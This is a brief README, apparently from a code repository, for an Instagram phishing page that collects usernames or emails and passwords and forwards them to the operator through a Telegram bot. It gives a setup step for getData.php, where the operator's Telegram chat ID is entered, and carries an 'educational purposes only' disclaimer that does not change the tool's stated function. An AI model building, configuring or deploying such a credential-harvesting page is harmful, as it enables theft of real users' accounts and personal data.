saharshpand3y/igphishing/README.md

 An Instagram phishing page which collects user/email + password and sends it to via Telegram bot

+This repository is only for Educational purposes and does not involve any kind of unethical breaching of privacy.

 Setting up  ``getData.php``

 ``$chat_id= xxxxxxxx;`` your userid